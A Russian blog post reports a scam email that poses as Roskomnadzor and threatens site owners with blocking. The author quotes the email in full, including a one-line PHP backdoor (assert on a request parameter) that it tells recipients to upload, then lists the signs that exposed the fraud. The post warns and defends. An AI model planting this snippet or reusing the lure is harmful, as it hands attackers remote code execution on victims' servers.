Развод под видом письма из Роскомнадзора

в 13:31, , рубрики: Песочница, метки:

Сегодня мною было получено удивительное письмо из «Роскомнадзора» с темой «Уведомление о внесении сайта kaskometr.ru в реестр организаторов распространения информации в сети «Интернет».

Ниже привожу текст полностью (орфография оригинала сохранена):

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени kaskometr.ru в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ «О внесении изменений в Федеральный закон „Об информации, ..., Ваш сайт kaskometr.ru был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени kaskometr.ru, Вам необходимо:

1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени kaskometr.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени kaskometr.ru, следую инструкции указанной выше, то Ваш сайт kaskometr.ru будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

Первая моя мысль была создать требуемый файл от греха подальше. Даже не читая код и не разбираясь в его сути, то же самое посоветовал мне один из разработчиков сайта. До какой же степени нас напугали Роскомнадзором, что мы чуть не разместили “подтверждение» на сайте?

Но я все же включил параноика и выяснил:

1. Письмо пришло с адреса zapret-info@roskomnadzor.org. На домене стоит редирект на сайт РКН.
2. Домен roskomnadzor.org зарегистрирован на физ лицо
3. В качестве электронной почты администратора нашего сайта указан другой адрес.
4. В тексте допущена орфографическая ошибка (следую инструкции указанной выше)

Я думаю, что большинство из читателей этого поста скажут что это очевидные вещи, которые нужно проверить. Однако страх перед блокировками настолько силен, что в первую минуту приходит мысль сделать как написано даже у опытных разработчиков, за плечами которых не один десяток проектов.

Будьте бдительны.

Автор: лорд Брабазон Вир-де-Вир

Источник

Поделиться новостью

* - обязательные к заполнению поля